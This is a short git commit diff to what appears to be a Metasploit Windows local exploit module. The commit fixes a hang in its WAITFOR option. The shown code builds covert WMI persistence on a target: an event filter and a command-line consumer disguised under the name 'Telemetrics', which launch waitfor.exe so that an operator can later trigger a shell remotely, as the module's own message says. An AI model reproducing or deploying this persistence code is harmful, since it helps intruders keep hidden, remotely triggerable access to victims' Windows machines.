fixed issue where starting waitfor.exe would hang the module

NickTyrer · NickTyrer · commit bc8de0fc6671 · 2017-06-24T20:54:31.000+01:00
diff --git a/modules/exploits/windows/local/wmi_persistence.rb b/modules/exploits/windows/local/wmi_persistence.rb
@@ -110,7 +110,6 @@ def exploit
       remove_persistence
     when 'WAITFOR'
       psh_exec(subscription_waitfor)
-      cmd_exec("waitfor.exe", args = " #{datastore['WAITFOR_TRIGGER']}")
       print_good "Persistence installed! Call a shell using \"waitfor.exe /S <target_ip> /SI "+datastore['WAITFOR_TRIGGER']+"\""
       remove_persistence
     end
@@ -189,6 +188,7 @@ def subscription_waitfor
     $filter1 = Set-WmiInstance -Namespace root/subscription -Class __EventFilter -Arguments @{EventNamespace = 'root/cimv2'; Name = \"Telemetrics\"; Query = \"SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime >= 240 AND TargetInstance.SystemUpTime < 325\"; QueryLanguage = 'WQL'}
     $consumer1 = Set-WmiInstance -Namespace root/subscription -Class CommandLineEventConsumer -Arguments @{Name = \"Telemetrics\"; CommandLineTemplate = \"waitfor.exe #{word}\"}
     $FilterToConsumerBinding = Set-WmiInstance -Namespace root/subscription -Class __FilterToConsumerBinding -Arguments @{Filter = $Filter1; Consumer = $Consumer1}
+    Start-Process -FilePath waitfor.exe #{word} -NoNewWindow
    HEREDOC
   end
 
